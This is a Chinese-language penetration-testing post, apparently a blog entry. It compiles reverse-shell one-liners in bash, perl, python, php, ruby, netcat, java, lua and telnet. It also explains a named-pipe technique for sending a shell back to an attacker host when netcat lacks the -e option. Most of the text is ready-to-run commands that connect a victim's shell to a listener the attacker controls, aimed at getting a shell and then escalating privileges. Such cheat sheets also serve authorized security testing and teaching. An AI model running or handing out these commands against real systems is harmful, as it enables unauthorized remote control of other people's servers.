参考:
http://www.freebuf.com/articles/system/10632.html
http://www.waitalone.cn/linux-shell-rebound-under-way.html
https://docs.python.org/2/py-modindex.html
大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。
bash版本:
1 | bash -i >& /dev/tcp/10 .0.0.1 /8080 0>&1 |
注意这个是由解析shell的bash完成,所以某些情况下不支持
perl版本:
1 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
python版本:
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
php版本:
1 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' |
ruby版本:
1 | ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' |
nc版本:
1 | nc -e /bin/sh 10.0.0.1 1234 |
2 | rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1|nc 10.0.0.1 1234 > /tmp/f |
3 | nc x.x.x.x 8888| /bin/sh |nc x.x.x.x 9999 |
java版本
1 | r = Runtime.getRuntime() |
2 | p = r. exec ([ "/bin/bash" , "-c" , "exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done" ] as String[]) |
3 | p.waitFor() |
lua版本:
1 | lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" |
nc不使用-e:
01 | Hacker:nc -lvnp listenport |
02 | Victim: mknod /tmp/backpipe p |
03 | Victim: /bin/sh 0< /tmp/backpipe | nc attackerip listenport 1> /tmp/backpipe |
04 | 不使用nc |
05 | Method 1: |
06 | Hacker: nc -nvlpp 8080 |
07 | Victim: /bin/bash -i > /dev/tcp/173 .214.173.151 /8080 0<&1 2>&1 |
08 | Method 2: |
09 | Hacker: nc -nvlpp8080 |
10 | Victim: mknod backpipe p && telnet 173.214.173.151 8080 0backpipe |
11 | Method 3: |
12 | Hacker: nc -nvlpp8080 |
13 | Hacker: nc -nvlpp8888 |
14 | Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888 |
参考文章:
http://zone.wooyun.org/content/5064
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
对于瑞士军刀nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是:
nc -l -vv -p 2222 -e /bin/bash
在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个
GAPING_SECURITY_HOLE常量),也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就
没办法利用了呢?天无绝人之路,来看下面的TIP。
在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:
root@bt:~#mknod /tmp/backpipe p
root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
第一条命令使用mknod在tmp目录下创建一个管道backpipe,第二条命令首先将默认shell环境的输入
重定向给刚才创建的管道,然后将输出通过nc attackerip
listenport重定向到攻击者一端,最后将shell的执行结果再重定向到管道中。
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。
------------------------------------
NC的原生做法:
nc -l -vv -p 2222 -e /bin/bash
无法使用NC反弹的时候可以这样
先在tmp创建一个普通管道
mknod /tmp/backpipe p
或者
mkfifo /tmp/backpipe p
然后管道一边接入shell,一变用NC反弹到攻击者主机x.x.x.x
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
PS:攻防的对抗一直在思路的转变之间,将原有思路逆转,可能收获不一样的东西!